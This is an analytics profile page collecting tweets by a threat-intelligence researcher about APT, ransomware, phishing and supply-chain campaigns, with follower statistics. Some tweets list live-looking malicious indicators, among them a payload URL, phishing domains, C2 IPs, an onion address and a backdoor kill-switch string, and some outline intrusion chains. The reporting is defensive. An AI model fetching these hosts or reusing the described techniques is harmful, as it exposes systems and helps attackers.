# @WhichbufferArda Arda Büyükkaya

Arda Büyükkaya posts on X most often about actor, in the, microsoft and apt. They currently have [-----] followers and [---] posts still getting attention, totalling [--] engagements in the last [--] hours.

### Engagements

- [--] Week [--] -82%
- [--] Month [-----] -79%
- [--] Months [-------] -48%
- [--] Year [-------] -32%

### Mentions

- [--] Months [--] -17%
- [--] Year [--] -14%

### Followers: [-----]

- [--] Week [-----] +0.10%
- [--] Month [-----] +0.25%
- [--] Months [-----] +9%
- [--] Year [-----] +38%

### CreatorRank

### Social Influence

**Social category influence**
[technology brands](/list/technology-brands)  [stocks](/list/stocks)  [countries](/list/countries)  [finance](/list/finance)  [social networks](/list/social-networks)  [cryptocurrencies](/list/cryptocurrencies)  [currencies](/list/currencies)  [ncaa football](/list/ncaa-football)  [travel destinations](/list/travel-destinations) 

**Social topic influence**
[actor](/topic/actor), [in the](/topic/in-the), [microsoft](/topic/microsoft), [apt](/topic/apt), [key](/topic/key), [file](/topic/file), [mobile](/topic/mobile), [data](/topic/data), [network](/topic/network), [windows](/topic/windows)

**Top assets mentioned**
[Microsoft Corp. (MSFT)](/topic/microsoft) [Crowdstrike Holdings Inc (CRWD)](/topic/crowdstrike) [Cloudflare, Inc. (NET)](/topic/cloudflare) [Alphabet Inc Class A (GOOGL)](/topic/$googl) [CyberConnect (CYBER)](/topic/cyber) [OORT (OORT)](/topic/oort) [Raytheon Technologies Corp (RTX)](/topic/$rtx)
### Top Social Posts
Top posts by engagements in the last [--] hours

"@malwrhunterteam @ShadowChasing1 @h2jazi @cyb3rops Here is the decrypted C2 URL: hxxps://cryptyk.ddns.net It's being stored inside the PDF file and Encrypted with [---] byte long XOR key decryption done by encrypt_pdf function upon execution of malware"  
[X Link](https://x.com/WhichbufferArda/status/1656980803450986496)  2023-05-12T11:13Z [----] followers, [---] engagements


"Malware Deobfuscation with @OpenAI Remcos malware delivery via ISO Obfuscated VBS Powershell Download Second Stage Inject into ielowutil.exe Injected Remcos: https://tria.ge/230812-t6nmbscf33/static1"  
[X Link](https://x.com/anyuser/status/1690404358481997824)  2023-08-12T16:46Z [----] followers, 15K engagements


"@ImposeCost It's Turkish barber shops doing ASMR videos :p you can search them in your area but I don't think you can find it in Virginia"  
[X Link](https://x.com/anyuser/status/1700918486623567948)  2023-09-10T17:05Z [--] followers, [--] engagements


"Backdoor found in XZ Utils versions 5.6.0 and 5.6.1 that is leading to ssh server compromise. This activity was assigned CVE-2024-3094. XZ Utils is data compression software 👀"  
[X Link](https://x.com/WhichbufferArda/status/1773813395474534906)  2024-03-29T20:44Z [----] followers, [----] engagements


"Testing the XZ Utils backdoor kill switch (yolAbejyiejuvnup=Evjtgvsh5okmkAvj): this string stops the backdoor so it won't hook into the RSA_public_decrypt() function"  
[X Link](https://x.com/anyuser/status/1774729956834123876)  2024-04-01T09:26Z [----] followers, 62K engagements


"Subdomain enumeration with open source tool called SubEnum F5 BIG-IP (CVE-2023-46747) exploit ARP scan on internal network after the exploit Port / Service enumeration Lateral movement to MSSQL Database Server Credential dump from MSSQL server RDP into MSSQL server data exfiltration. Linked to the Cyber Court and Makhlab al-Nasr Pro-Palestinian hacking group. cc @BushidoToken #BREAKING A hacker group named Makhlab_al_Nasr has hacked the data of [--] million Israelis including: 1-their personal information 2-bank account details 3-residential addresses and more which are now at the disposal of the"  
[X Link](https://x.com/anyuser/status/1775817205403230643)  2024-04-04T09:26Z [----] followers, 53.4K engagements


"@utkusen https://www.virustotal.com/gui/file/3fe7211742fc790d5b26b04bc4a1f707abd1fd6ae27b79947a842c9863a94711/details"  
[X Link](https://x.com/WhichbufferArda/status/1779227773447368942)  2024-04-13T19:18Z [----] followers, [----] engagements


"@utkusen I found this only through the name similarity, so I'm not entirely sure whether this malware was actually the one used or a different one. CrowdStrike would most likely catch it."  
[X Link](https://x.com/WhichbufferArda/status/1779248648607383778)  2024-04-13T20:41Z [----] followers, [--] engagements


"Cyber Army of Russia Reborn (CARR) is a hacktivist Telegram persona associated with #APT44 by @Mandiant. CARR prepared a training for DDOS attacks against Ukrainian targets; you can see the username of the device is "SergoZar" which is likely associated with Github user "SergoZar". Persona "SergoZar" is using a public portfolio page and following himself which is Mr. Alexander Ryabov aka "ZKelo" or "SergoZar". It's just an assumption, I'm not linking Cyber Army of Russia Reborn (CARR) to this gentleman, but for me this profile is matching an interesting link. What do you think @BushidoToken"  
[X Link](https://x.com/anyuser/status/1781435565923061904)  2024-04-19T21:31Z [----] followers, 18.5K engagements


"🤣cc @herrcore https://github.com/NationalSecurityAgency/ghidra/assets/42712921/ba4acc7f-f7d5-4cdf-be86-44eb503fe0cc"  
[X Link](https://x.com/WhichbufferArda/status/1781989720601289155)  2024-04-21T10:13Z [----] followers, [----] engagements


"@ThisMyHandle @herrcore It's TLP:RED nah just open an issue and upload your stuff in that comment then copy the link here you go magic"  
[X Link](https://x.com/WhichbufferArda/status/1782023755532759485)  2024-04-21T12:29Z [----] followers, [---] engagements


"According to Microsoft the Chinese APT group Volt Typhoon camouflages its command-and-control (C2) network activities by compromising small office and home office (SOHO) network equipment. The previous report highlights that Volt Typhoon employs a modified version of the Fast Reverse Proxy (FRP) to maintain persistent access to victim networks. When I analyzed the UPX-packed FRP sample referenced in the report I discovered the string 'MAGA2024' alongside a hardcoded 64.183.202.102 C2 IP address. This IP is linked to an SSL certificate for a 'Vigor Router' and with a location metadata as"  
[X Link](https://x.com/anyuser/status/1789381168892149910)  2024-05-11T19:44Z [----] followers, 75.6K engagements


"Microsoft Report: UPX Packed FRP: 472ccfb865c81704562ea95870f60c08ef00bcd2ca1d7f09352398c05be5d05d Unpacked FRP: a0e581c0698a64bcb97f239172b31ed9009de1a89ba0d0e1e2fce2dfc6a496c0 C2 IP: 64.183.202.102 cc @BushidoToken https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/"  
[X Link](https://x.com/WhichbufferArda/status/1789381171236802561)  2024-05-11T19:44Z [----] followers, [----] engagements


"@BushidoToken With low confidence since compromised C2 IP is DrayTek Vigor2960 Series router threat actor probably used CVE-2020-19664 RCE. https://github.com/peanuts62/bug_poc"  
[X Link](https://x.com/WhichbufferArda/status/1789405270638002549)  2024-05-11T21:20Z [----] followers, [----] engagements


"I woke up and looked at my livehunt alerts in VT. I saw the confidential emails accidentally uploaded by one of the Five Eye countries. I shut down my laptop and took a walk"  
[X Link](https://x.com/WhichbufferArda/status/1796281877248221208)  2024-05-30T20:45Z [----] followers, [---] engagements


"The rise of the far-right movements in Europe. Interesting political trend to watch for it. The state of France this evening This shows the party that came top in voting for the European Parliament on June [--] in every commune in France. Brown represents the far right https://t.co/PP0C5KjrIW"  
[X Link](https://x.com/WhichbufferArda/status/1799916014131437643)  2024-06-09T21:26Z [----] followers, [---] engagements


"@RussianPanda9xx That's why I love CTI community 😎"  
[X Link](https://x.com/WhichbufferArda/status/1803287938773504075)  2024-06-19T04:45Z [----] followers, [---] engagements


"@jamieantisocial @Gi7w0rm @DrunkBinary @AShukuhi Thank you 😊"  
[X Link](https://x.com/WhichbufferArda/status/1803679514456719494)  2024-06-20T06:41Z [----] followers, [---] engagements


"🌟 Exciting Announcement I am happy to share that I will be attending and presenting at the ENISA Cyber Threat Intelligence (CTI) for Europe conference on October 1st The event will be held at the Hotel Thon Bristol Stephanie in Brussels Belgium. I will present my latest research on the "Rebranding of the Caffeine Phishing Kit Targeting Financial Institutions." This topic is part of the session on using open-source intelligence (OSINT) and technical intelligence (TECHINT) for analysis scheduled from 11:30 to 12:30. Join me and other industry experts as we delve into the latest developments in"  
[X Link](https://x.com/WhichbufferArda/status/1812049472605561037)  2024-07-13T09:00Z [----] followers, [---] engagements


"I created a simple Group Policy (GPO) to automatically fix CrowdStrike BSOD (Blue screen of death) issue. https://gist.github.com/whichbuffer/7830c73711589dcf9e7a5217797ca617 BREAKING: The US Aviation Authority has required all flights to land due to a technical computer glitch. https://t.co/dPVzkhHZAS"  
[X Link](https://x.com/anyuser/status/1814213796946137349)  2024-07-19T08:20Z [----] followers, 120.4K engagements


"Fake CVE exploit POCs especially for high-profile vulnerabilities like CVE-2024-38063 are unfortunately a common tactic used by malicious actors to distribute malware over Github. https://www.virustotal.com/gui/file/0dfa551e2b12af0991714a3e5be26c9a4c00f7663f065dbf4d8b84c9abc7b97a/detection"  
[X Link](https://x.com/anyuser/status/1824924289398689999)  2024-08-17T21:40Z [----] followers, 18.6K engagements


"🚨 Beware Threat actors are using PDFs to lure victims into installing the FleetDeck RMM tool. These malicious PDFs embed a URL (agent.fleetdeck.io) behind a button tricking users to click and download the FleetDeck executable. Once installed this remote management tool could give attackers control over your device. #CyberSecurity #PhishingAlert"  
[X Link](https://x.com/WhichbufferArda/status/1826735715893248086)  2024-08-22T21:38Z [----] followers, [--] engagements


"Here is one that targets users in the Netherlands with Dutch language. They are using a Real Estate lure this time. Same author was observed over and over: "Dennis Block""  
[X Link](https://x.com/WhichbufferArda/status/1826737329869844665)  2024-08-22T21:44Z [----] followers, [---] engagements


"🕸💻 Check out my latest analysis on how SCATTERED SPIDER targets cloud infrastructures in the financial and insurance sectors. cc @BushidoToken @Gi7w0rm @TomHegel @AShukuhi @UK_Daniel_Card #CyberSecurity #ThreatIntelligence #Ransomware #CloudSecurity https://blog.eclecticiq.com/ransomware-in-the-cloud-scattered-spider-targeting-insurance-and-financial-industries"  
[X Link](https://x.com/anyuser/status/1833530199805464806)  2024-09-10T15:37Z [----] followers, 37.6K engagements


"I've outlined the full Ransomware Deployment Life Cycle for cloud environments detailing key stages of attack persistence and execution. Also don't miss the deep dive on Telecom Enemies, a Developer-as-a-Service (DaaS) group empowering phishing and cyberattacks using tools like the Gorilla Call Bot for vishing attacks. Their influence is growing within underground forums. 🕸💻 Check out my latest analysis on how SCATTERED SPIDER targets cloud infrastructures in the financial and insurance sectors. https://t.co/awFf6sUDYB cc @BushidoToken @Gi7w0rm @TomHegel @AShukuhi @UK_Daniel_Card #CyberSecurity"  
[X Link](https://x.com/anyuser/status/1833530882264862940)  2024-09-10T15:40Z [----] followers, 14.1K engagements


"It seems like someone popped OpenAI's X account to spread some crypto scam. Remember kids there is no free or easy money. Stay safe ☢"  
[X Link](https://x.com/WhichbufferArda/status/1838346480534356238)  2024-09-23T22:35Z [----] followers, [----] engagements


"Today I had the privilege of presenting at the ENISA CTI Conference in Brussels . It was a fantastic experience with insightful speakers and excellent networking opportunities"  
[X Link](https://x.com/WhichbufferArda/status/1841162931402072437)  2024-10-01T17:07Z [----] followers, [---] engagements


"The costs of fragmentation: as trade falls and barriers rise, global growth will likely take a severe hit in coming years. According to the latest International Monetary Fund projections, annual global GDP growth in [----] will be only three percent, the IMF's lowest five-year-ahead forecast in the past three decades, which spells trouble for poverty reduction and for creating jobs among burgeoning populations of young people in developing countries. Fragmentation risks making this already weak economic picture even worse. As growth falls, opportunities vanish and tension builds, the world, already divided by"  
[X Link](https://x.com/WhichbufferArda/status/1850562911695196183)  2024-10-27T15:39Z [----] followers, [---] engagements


"🚨🕷 Proud to share my latest research on the LUNAR SPIDER campaign. Our findings reveal how RaaS operators leveraged LUNAR SPIDER's malware including IcedID and the Latrodectus loader along with Brute Ratel C4 infrastructure to enable their attacks on the financial sector. cc @BushidoToken @HackingLZ @cyb3rops @MichalKoczwara @RussianPanda9xx @ddd1ms @jstrosch https://blog.eclecticiq.com/inside-intelligence-center-lunar-spider-enabling-ransomware-attacks-on-financial-sector-with-brute-ratel-c4-and-latrodectus"  
[X Link](https://x.com/anyuser/status/1851612883609670039)  2024-10-30T13:11Z [----] followers, 31.8K engagements


"🚨 New threat research: SilkSpecter a likely China-based threat actor is targeting EU & US e-commerce shoppers for financial fraud by using fake Black Friday sites to steal victims' debit and credit card details. https://blog.eclecticiq.com/inside-intelligence-center-financially-motivated-chinese-threat-actor-silkspecter-targeting-black-friday-shoppers"  
[X Link](https://x.com/anyuser/status/1857073740384788977)  2024-11-14T14:50Z [----] followers, 10.8K engagements


"The FBI linked "BUCHANAN" to Scattered Spider through phishing domains like fake Okta sites registered on NameCheap using the email lululongstaffihw98@gmail.com under the username "bobsagetfaget." These domains were traced to his residence confirming his role in the group's credential theft campaigns. cc @BushidoToken https://www.documentcloud.org/documents/25355101-usa-v-buchanan-complaint-redacted"  
[X Link](https://x.com/anyuser/status/1859320516471030256)  2024-11-20T19:38Z [----] followers, 37.3K engagements


"Phishing domain tmobiie.us was created by Tyler Robert Buchanan aka "bobsagetfaget" or "BUCHANAN". You can see the reverse whois lookup result. The FBI linked "BUCHANAN" to Scattered Spider through phishing domains like fake Okta sites registered on NameCheap using the email lululongstaffihw98@gmail.com under the username "bobsagetfaget." These domains were traced to his residence confirming his role in the group's https://t.co/HUQgImtn5P"  
[X Link](https://x.com/anyuser/status/1859323657517953160)  2024-11-20T19:51Z [----] followers, 18.5K engagements


"Very Similar domains over here: tmobiie.com staging.tmobiie.com mintmobiie.com tmobiie.net americafirstmobiie.com okta-tmobiie.net okta.tmobiie.net"  
[X Link](https://x.com/WhichbufferArda/status/1859324979994570828)  2024-11-20T19:56Z [----] followers, [---] engagements


"After using some cool network pivoting tricks and a zero-day privilege escalation the threat actor leveraged noisy reg.exe to dump SAM credentials and PowerShell to compress the results. https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/"  
[X Link](https://x.com/WhichbufferArda/status/1860025852744073501)  2024-11-22T18:21Z [----] followers, [----] engagements


"🕷🕸SCATTERED SPIDER phishing activities: Registrar: - Hosting Concepts B.V. d/b/a Registrar EU iuiuiemon.com - 2024-11-13 vision-victra.com - 2024-11-09 cc @BushidoToken @malwrhunterteam @TLP_R3D @AlvieriD @ImposeCost"  
[X Link](https://x.com/anyuser/status/1861060536776999256)  2024-11-25T14:53Z [----] followers, [----] engagements


"Threat actors exploit GlobalProtect (CVE-2024-3400) to deliver the Sliver C2 malware (up.js) by leveraging a compromised VICIdial server; the threat actor likely exploited CVE-2024-8504 to store their payloads on a legitimate server (104.131.69.106/vicidial/up.js)"  
[X Link](https://x.com/anyuser/status/1864735776413540600)  2024-12-05T18:17Z [----] followers, 14.7K engagements


"Supply chain attempt on ultralytics PyPI package. Attacker opened a pull request and pushed a commit with a malicious name leading to CI code injection. They then backdoored versions 8.3.41 and 8.3.42 with code downloading a second-stage binary from GitHub. https://github.com/ultralytics/ultralytics/pull/18020"  
[X Link](https://x.com/WhichbufferArda/status/1864755296058642541)  2024-12-05T19:34Z [----] followers, [----] engagements


"🕵Gamaredon #APT activity targeting State Bureau of Investigation in Ukraine (DBR or ): Phishing email - XHTML Smuggling Payload - Download RAR - LNK - MSHTA LOLBIN Download third stage Email: 27515d71b91bbdbb55437de6b729663c0cd206d7112ddbc439d82d8a6e1dde3e HTML Payload: b5d59bb932843ca58c29971e73edfe642731701f29133eb1cfb8841e198d567f Download Second Stage RAR file from: entities-important-surgeon-ever.trycloudflare.com LNK File: 35f714c491897d32c7c68386dac02615071ae4587729dc46d524c6e468ac1cbe"  
[X Link](https://x.com/anyuser/status/1865043823207796759)  2024-12-06T14:41Z [----] followers, [----] engagements


"With the fall of the Assad regime in Syria the status of Russia's critical military installations, most notably the Tartus naval base and the Hmeimim Air Base, has become uncertain. Although current satellite imagery does not indicate an immediate departure a full Russian withdrawal in the near future appears increasingly likely. Such a move would seriously compromise Moscow's corridor into Africa curtailing its ability to maintain logistical operations in Libya and to project power across the Mediterranean. Should Russia attempt to evacuate its naval presence Turkish restrictions at the Bosphorus"  
[X Link](https://x.com/WhichbufferArda/status/1866922078953251226)  2024-12-11T19:04Z [----] followers, [---] engagements


"An unknown threat actor is leveraging OORT infrastructures a US-based decentralized cloud solution actively used by Chinese users to deliver Word documents embedded with QR codes. These documents use HR-related lures to target South Korean entities aiming to execute phishing attacks. IOC: employee-benefits-package.archive.us-east-1.oortech.com 321719a387926235b0bca136b971d870e3ac1966a878fb9b2dc4b5bbc84cf517 bee2d564b8b84d4598decc0ed03a384a50cae84a5507ef2302aa1141fb46a378 c074608fdc2aaf7dc01f99002ac7e73ab372e8fe538161ba715446c17fcda2f6"  
[X Link](https://x.com/WhichbufferArda/status/1867264551596507193)  2024-12-12T17:45Z [----] followers, [---] engagements


"Summary of the Treasury Department breach (per public sources): A key unresolved cybersecurity issue lies in securing third-party vendor relationships. cc @BushidoToken @DrunkBinary @cyb3rops @TLP_R3D"  
[X Link](https://x.com/anyuser/status/1876348324338618733)  2025-01-06T19:21Z [----] followers, [----] engagements


"From the BlackBasta chat logs I obtained access to GoblinCrypt, a private malware encryption tool used to bypass EDR/AV. With it I pivoted into each malware sample and C2 address. Here's the full https://gist.github.com/whichbuffer/20820e3c0ad52c0a4496fa64dd2a01bf"  
[X Link](https://x.com/anyuser/status/1893329469038850070)  2025-02-22T15:58Z [----] followers, 36.3K engagements


"Threat actor has been observed targeting Colombian government entities including Consorcio Fopep under the Ministry of Labor via a phishing campaign that uses malicious SVG email attachments. When a victim opens the attached SVG file it downloads a second-stage malware payload packaged inside a password-protected ZIP archive. This payload initiates the delivery of the Remcos Remote Access Trojan (RAT) via DLL sideloading. The threat actor abused ciscosparklauncher.dll to launch the Remcos RAT. Additionally they loaded the vulnerable driver zamguard64.sys, associated with Zemana Anti-Malware, to"  
[X Link](https://x.com/anyuser/status/1911160065597362365)  2025-04-12T20:50Z [----] followers, 10.1K engagements


"Sri Lanka Ministry of Foreign Affairs hit by a phishing attack. The email titled HIGHLY CONFIDENTIAL - Rotation of Sri Lankan Peacekeepers and Human Rights Clearance came from a Microsoft [---] account belonging to Pakistan's Naval University "pro-rector.admin@bahria.edu.pk". The phishing email used an embedded image designed to mimic a Gmail message with an attachment. In reality the image linked to a malicious URL: "gs23-production.up.railway.app/fgefwegfwefa33hh23=". This link briefly led to a PDF file before redirecting the user to a fake Gmail login page to steal their credentials. The"  
[X Link](https://x.com/WhichbufferArda/status/1915113093576720663)  2025-04-23T18:38Z [----] followers, [----] engagements


"The SAP NetWeaver exploit (CVE-2025-31324) is seriously bad. I've seen some of the targets, it's horrifying. There are critical infrastructure networks affected 😬"  
[X Link](https://x.com/anyuser/status/1917710109054230876)  2025-04-30T22:38Z [----] followers, [----] engagements


"🚨 Luna Moth is back hitting U.S. law & finance firms with callback phishing: Deceive victims to call fake IT helpdesks Abuse GoDaddy infra & Reamaze AI chatbots for social engineering Live operators guide victims to install RMM tools WinSCP & Rclone for data exfiltration Data theft followed by extortion through threats to publish on a data leak site (DLS). https://blog.eclecticiq.com/from-callback-phishing-to-extortion-luna-moth-abuse-reamaze-helpdesk-and-rmm-tools-against-u.s.-legal-and-financial-sectors"  
[X Link](https://x.com/WhichbufferArda/status/1917894864425120093)  2025-05-01T10:52Z [----] followers, 35K engagements


"Multiple Chinese nation-state APT groups have gained initial access to critical infrastructure networks through SAP NetWeaver intrusions aiming to conduct cyber-enabled espionage and maintain persistent remote access. https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures"  
[X Link](https://x.com/anyuser/status/1922261336072892695)  2025-05-13T12:03Z [----] followers, 94.4K engagements


"🚨UNC5221 China-Nexus Threat Actor Actively Exploiting Ivanti EPMM (CVE-2025-4428). Victims include: Germany's top telecom provider & defense contractors UK healthcare institutions tied to NHS U.S. pharma aviation and mobile security companies Leading APAC banks and automotive tech firms Multiple EU local governments & research institutes https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability"  
[X Link](https://x.com/anyuser/status/1925210805793955889)  2025-05-21T15:23Z [----] followers, 40.5K engagements


"Ivanti EPMM stored MySQL creds in cleartext (/mi/files/system/.mifpp). Threat actors accessed the DB and exfiltrated mobile device metadata (IMEI SIM location) LDAP configs and Office [---] tokens from potentially thousands of victims. Read more here: https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability"  
[X Link](https://x.com/anyuser/status/1925451725642539393)  2025-05-22T07:20Z [----] followers, [----] engagements


"The Pakistan Airports Authority (PAA) appears to have been compromised their email infrastructure being used to distribute password-protected ZIP archives containing a previously undocumented malware. The payload is disguised with an .MCU file extension masquerading as a legitimate Excel document. The phishing campaign leverages a lure titled Telecom Sector Collaboration for Aviation Modernization clearly tailored to target the telecommunications industry within Pakistan. Interestingly I found an easter egg inside the remote host the threat actor behind the campaign claims affiliation with"  
[X Link](https://x.com/anyuser/status/1933300356370325981)  2025-06-12T23:08Z [----] followers, 22.4K engagements


"EntroLink is a South Korean network security company that developed the PPX-AnyLink VPN appliance. As of recent Shodan scans approximately [--] devices remain exposed most of them located in South Korea. In [----] ransomware groups such as LockBit and BlackMatter exploited another RCE vulnerability in PPX-AnyLink enabling root-level access to victim networks. https://therecord.media/ransomware-gangs-are-abusing-a-zero-day-in-entrolink-vpn-appliancesutm_source"  
[X Link](https://x.com/WhichbufferArda/status/1933606757907247315)  2025-06-13T19:25Z [----] followers, [---] engagements


"Threat actors actively abuse "Robocopy" (a built-in Windows utility) to deliver malware from WebDAV. You can quickly detect this behavior by using SIGMA rule: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml Malware Sample: https://bazaar.abuse.ch/sample/62fce3f773ec3911fe1a20d3aca1fced6c1a5afa4d8f58711e49232b7dc9c111"  
[X Link](https://x.com/anyuser/status/1939668867476832300)  2025-06-30T12:54Z [----] followers, [----] engagements


"China-nexus APTs aren't just targeting governments, they're going after critical industries that power our daily lives. Join us on [--] July to explore why threat intelligence is essential to detect understand and stop these threats before they breach your defences. 🔗 #cyber #APAC #EU #US @EclecticIQ @TeamT5_Official https://lnkd.in/eCZRNhjW"  
[X Link](https://x.com/WhichbufferArda/status/1940430058155393276)  2025-07-02T15:19Z [----] followers, [----] engagements


"✈Airline customers targeted with callback phishing threat actor using helpdesk and customer support lures. The phishing domains are often hosted on Cloudflare Pages. Here are some IOCs: official-airlines-support-hub.neocities.org frontier-airlines-support.pages.dev official-airlines-support.pages.dev emirates-airlines-support.pages.dev emirates-airlines-support.pages.dev qantas-airlines-support-pages.dev qantas-airlines-support.pages.dev copa-airlines-support-1ao.pages.dev all-airlines-supportdesk.pages.dev lufthansa-airlines-supports.pages.dev lufthansa-airlines-support.pages.dev"  
[X Link](https://x.com/WhichbufferArda/status/1940681465265619409)  2025-07-03T07:58Z [----] followers, [---] engagements


"🚨Here is my analysis on GLOBAL GROUP RaaS. I identified the IP address behind their Tor-based Dedicated Leak Site (DLS): 193.19.119.4. The server is hosted by IpServer a Russia-based VPS provider also previously used to host the DLS infrastructure for the Mamona RIP ransomware operation. The GLOBAL GROUP RaaS manager (alias $$$) actively seeks remote access to corporate networks via Initial Access Brokers (IABs). Targeting enterprise VPN appliances (Fortinet Palo Alto Cisco) and routinely acquires RDP access to high value targets."  
[X Link](https://x.com/anyuser/status/1945029879163965470)  2025-07-15T07:57Z [----] followers, 16.6K engagements


"Qilin ransomware affiliate hastalamuerte claims he lost $48K after a ransom negotiation mysteriously disappeared from a Tox chat. In the same thread another actor Nova posted credentials and a screenshot of Qilin's affiliate panel to embarrass the group. ji57fr53anp7wb44tbbnp72qcgbhqywy4jmbncawdcrejj5amuvh3zqd.onion"  
[X Link](https://x.com/anyuser/status/1950934137881207205)  2025-07-31T14:58Z [----] followers, [----] engagements


"@l0kutus No it's Ramp"  
[X Link](https://x.com/WhichbufferArda/status/1950945570551443726)  2025-07-31T15:44Z [----] followers, [--] engagements


"🚨 Nova RaaS admin is actively looking for access to enterprise remote access solutions Fortinet VPN Citrix Cisco VPN & Microsoft RDWeb. Many enterprises still lack the visibility to detect and disrupt these initial breach points a gap ransomware gangs continue to abuse with a high success rate"  
[X Link](https://x.com/WhichbufferArda/status/1950955120088248819)  2025-07-31T16:22Z [----] followers, [---] engagements


"ShinyHunters have released their exploit tool for SAP NetWeaver Visual Composer (CVE-2025-31324). While analysing the Base64-encoded Java payload I spotted an unusual marker string: "Pwner274576528033300""  
[X Link](https://x.com/anyuser/status/1956354918026985634)  2025-08-15T13:58Z [----] followers, 11.3K engagements


"NPM developer "qix" was compromised with 2FA themed phishing leading to a massive supply chain attack that infected core libraries with over 1B weekly downloads. The injected malware is designed to steal crypto keys swap wallet addresses and hijack transactions. Phishing domain: npmjs.help Passive DNS: 185.7.81.108"  
[X Link](https://x.com/WhichbufferArda/status/1965130927061008745)  2025-09-08T19:11Z [----] followers, [----] engagements


"The macOS information stealer service previously marketed as Mentalpositive appears to have been rebranded under the name MacSync. The developers highlight capabilities such as browser credential theft, keychain decryption, crypto-wallet theft, Telegram session hijacking and recursive file collection"  
[X Link](https://x.com/WhichbufferArda/status/1966447655971623149)  2025-09-12T10:23Z [----] followers, [---] engagements


"A separate module for phishing Ledger seed phrases is available at additional cost. The service is offered on subscription for USD [----] per month, with customer support facilitated via a dedicated Telegram channel"  
[X Link](https://x.com/WhichbufferArda/status/1966447658718855548)  2025-09-12T10:23Z [----] followers, [---] engagements


"I extracted the malicious Bash workflow embedded in the Tinycolor supply chain attack. It persists inside victim repositories by executing automatically during CI/CD runs, harvesting secrets and environment variables and exfiltrating them to an attacker-controlled webhook. Here is the script. I have a feeling that it was generated by AI 😅 https://gist.github.com/whichbuffer/d4922cff694307175310c4f285b09370"  
[X Link](https://x.com/WhichbufferArda/status/1968027917868282148)  2025-09-16T19:03Z [----] followers, [----] engagements


"🐛 New GoAnywhere MFT vulnerability with CVSS score [--] (CVE-2025-10035); there are 90K+ internet-facing MFT servers. Similar flaws were exploited by Cl0p RaaS in [----]. We are going to see more ransomware victims soon, patch now (7.8.4 / 7.6.3) https://www.fortra.com/security/advisories/product-security/fi-2025-012"  
[X Link](https://x.com/WhichbufferArda/status/1969127061039059109)  2025-09-19T19:50Z [----] followers, [----] engagements


"I found documentation for ARINC cMUSE showing that it can be deployed on AWS cloud. I wonder, is this a cloud security oopsie? On Saturday a major cyberattack against ARINC cMUSE, a check-in and boarding system produced by Collins Aerospace, a subsidiary of RTX Corporation (Raytheon), disrupted operations and caused serious delays at several airports across Europe including London's Heathrow Airport https://t.co/chIfCtyuLm"  
[X Link](https://x.com/WhichbufferArda/status/1969539530781806884)  2025-09-20T23:09Z [----] followers, [----] engagements


"@SimoKohonen Exactly, they did succeed in targeting highly sensitive government entities in the Middle East by simply exploiting ProxyShell vulnerabilities"  
[X Link](https://x.com/WhichbufferArda/status/1973490912757178532)  2025-10-01T20:51Z [----] followers, [---] engagements


"@RussianPanda9xx Likewise, let me know if you're coming to CYBERWARCON or Black Hat EU ;)"  
[X Link](https://x.com/WhichbufferArda/status/1975085206077104293)  2025-10-06T06:26Z [----] followers, [---] engagements


"🚨Here is my latest research at @EclecticIQ: ShinyHunters teamed up with Scattered Spider to conduct vishing attacks targeting cloud application users, bribing employees for insider access and targeting CI/CD tools for supply chain attacks. https://blog.eclecticiq.com/shinyhunters-calling-financially-motivated-data-extortion-group-targeting-enterprise-cloud-applications"  
[X Link](https://x.com/WhichbufferArda/status/1968268768574046288)  2025-09-17T11:00Z [----] followers, 67.7K engagements


"Imagine working at an Iranian APT group putting in [---] hours just to exploit some NETGEAR and Cisco modems. The best part? They even partnered with the Iranian data center Tebyan and tried to use Starlink"  
[X Link](https://x.com/WhichbufferArda/status/1973425338526155058)  2025-10-01T16:30Z [----] followers, [----] engagements


"Companies like Memento Labs (ex-Hacking Team) sell lawful interception tools for millions of euros to governments, yet their code is wrapped in VMProtect, the same commercial packer used by cracked games, coin miners and script-kiddie trojans, lmao. https://securelist.com/forumtroll-apt-hacking-team-dante-spyware/117851/"  
[X Link](https://x.com/WhichbufferArda/status/1982738297886589390)  2025-10-27T09:17Z [----] followers, 17.1K engagements


"🚨 Ongoing phishing campaign abusing Cloudflare Pages and ZenDesk. Threat actors registered more than [---] *.pages.dev domains using typosquatting to impersonate customer support portals for well-known brands. Phishing pages are very likely AI-generated and include an embedded live chat interface staffed by a human operator who asks for the victim's phone number and email address under the pretext of providing technical assistance. The attacker then instructs victims to install a legitimate remote monitoring tool (Rescue) which grants them full remote access to the device. Their primary intent is to"  
[X Link](https://x.com/WhichbufferArda/status/1984670521242320970)  2025-11-01T17:15Z [----] followers, [----] engagements


"All of the phishing pages use the same Google site verification and Microsoft Bing Webmaster tokens; the threat actor abuses these for SSO poisoning. Here is the list of domains: https://gist.github.com/whichbuffer/4dab8a4d4ce4fea0dbfe73b7e3c3f6a7"  
[X Link](https://x.com/WhichbufferArda/status/1984670529975160898)  2025-11-01T17:15Z [----] followers, [---] engagements


"cc @Cloudflare nuke these domains please"  
[X Link](https://x.com/WhichbufferArda/status/1984670890144010344)  2025-11-01T17:16Z [----] followers, [---] engagements


"Thank you supreme leader Kim Jong Un ❤ Another great day sharing research @CYBERWARCON #DPRK #PRC #BSidesPyongyang2025 https://t.co/0mjgVilUdZ"  
[X Link](https://x.com/WhichbufferArda/status/1991311838668288504)  2025-11-20T01:05Z [----] followers, [----] engagements


"Truly an honor to speak at Black Hat EU this year, had an amazing time and great conversations. @BlackHatEvents #BHEU"  
[X Link](https://x.com/WhichbufferArda/status/1999105537363849368)  2025-12-11T13:14Z [----] followers, [---] engagements


"🧵Likely Russian-nexus credential harvesting campaign targeting government, military, intelligence and defense entities in Europe. Intrusion starts with phishing emails delivering HTML files masquerading as NATO/security documents. The embedded forms harvest login credentials (email/Citrix VPN accounts) and exfiltrate them via threat-actor-controlled Formcarry instances. https://twitter.com/i/web/status/2004658722669232416"  
[X Link](https://x.com/WhichbufferArda/status/2004658722669232416)  2025-12-26T21:00Z [----] followers, [----] engagements


